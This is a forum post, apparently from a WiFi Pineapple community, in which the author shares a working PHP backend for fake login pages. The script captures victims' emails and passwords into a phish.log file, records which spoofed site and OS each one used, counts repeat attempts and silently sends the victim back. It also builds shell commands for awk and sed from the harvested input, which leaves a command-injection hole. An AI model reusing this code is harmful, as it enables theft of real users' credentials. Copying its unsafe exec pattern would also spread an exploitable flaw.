My error.php

[NullNull]

Hello guys, i just want to share the error.php file i am using... It's nothing special since my knowledge in php is limited but here it is..

• When i use the pineapple in real action it doesn't have an internet connection so the "date("G:i:s")" command (line 3) shows the "up time" of the pineapple.
• The original error.php was posting at the phish.log the entire url wich in my case was something like this:
  http://www.blabla.com/web/files/example1/example1.html . I didn't liked the output of that so i added the first "if" wich changes the final output to this " hh:mm:ss -- Example 1 -- email -- password"
  
• I noticed that when the victim could not establish an internet connection he was pressing the "Log in" button again and again with out typing the password and because i dont think someone has a blank password in the websites i "phish" i added the "&& !empty($_POST['pass'])" (line 14) so it wont log any data with blank password.
  
• Also not having an internet connection the victim was trying again and again with the same credentials leading to long and difficult to read logs. For this reason i added the third "if".
  
  EDIT:
  
• Added $_SERVER["HTTP_USER_AGENT"] wich detects clients OS
  
• Counting how many times the victim uses the same combination email/password
  
  

  <?php
  $uptime = date("G:i:s");
  
  
  
  /* =========== Detect the Phishing Page =========== */
  
  $ref = $_SERVER['HTTP_REFERER'];
  if (strpos($ref, "example1")){
      $page = "Example 1";
  
  } elseif (strpos($ref, "example2")){
      $page = "Example 2";
  }
  
  /* ================================================ */
  
  
  
  
  /* ================= Detect the OS ================ */
  
  $ua = $_SERVER["HTTP_USER_AGENT"];
  $platform = "Unknown";
  if (strpos($ua, "Android")) {
      $platform = "Android";
  }
  elseif (strpos($ua, "iPhone")) {
      $platform = "iPhone";
  }
  elseif (strpos($ua, "Windows")) {
      $platform = "Windows";
  }
  elseif (strpos($ua, "BlackBerry")) {
      $platform = "BlackBerry";
  }
  elseif (strpos($ua, "Linux")) {
      $platform = "Linux";
  }
  elseif (strpos($ua, "Macintosh")) {
      $platform = "Macintosh";
  }
  
  /* ================================================ */
  
  
  
  
  
  
  /* ====================== Checking and Saving Data =============================== */
  
  if (isset($_POST['email']) && !empty($_POST['email']) && !empty($_POST['pass'])) {
      $nam = stripslashes($_POST['email']);
      $pas = stripslashes($_POST['pass']);
      $nam = htmlspecialchars($nam, ENT_QUOTES);
      $pas = htmlspecialchars($pas, ENT_QUOTES);
      $cre = $page . "  --  ". $nam . "  --  " . $pas;
  
      $file = file_get_contents("/pineapple/phish.log");
      $count = 1;
  
      if (!strpos($file, $cre)) {
          $content = $cre . "  --  " . $count . "  --  " . $platform . "  --  " . $uptime;
          $filed = @fopen("/pineapple/phish.log", "a+");
          @fwrite($filed, $content."\n");
          @fclose($filed);
      } else {
          $count = exec("awk -F '  --  ' '$0 ~ str{print substr($4,1)}' str='$cre ' /pineapple/phish.log");
          $count = $count + 1;
          exec("sed '/$cre /c \\$cre  --  $count  --  $platform  --  $uptime'  -i /pineapple/phish.log");
  }
  }
  
  /*================================================================================ */
  ?>
  
  
  <html><head>
  <script type="text/javascript">
  function goBack()
  {
  window.history.back()
  }
  </script>
  </head>
  <body onload="goBack()">
  </body></html>
  

I am sure there is a much better and cleaner way to do all this but thats all i got :P. Any suggestions and changes of course are welcomed.

Edited August 7, 2013 by KiatoG